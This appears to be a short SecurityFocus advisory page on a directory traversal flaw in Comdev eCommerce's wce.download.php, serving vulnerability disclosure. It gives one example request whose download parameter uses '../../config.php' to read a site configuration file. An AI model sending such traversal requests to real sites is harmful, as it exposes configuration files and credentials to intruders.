info
discussion
exploit
solution
references
Comdev eCommerce WCE.Download.PHP Directory Traversal Vulnerability
No exploit is required.
An example has been provided:
http://www.vulnerable.com/oneadmin/faqsupport/wce.download.php?download=../../config.php
Privacy Statement
Copyright 2010, SecurityFocus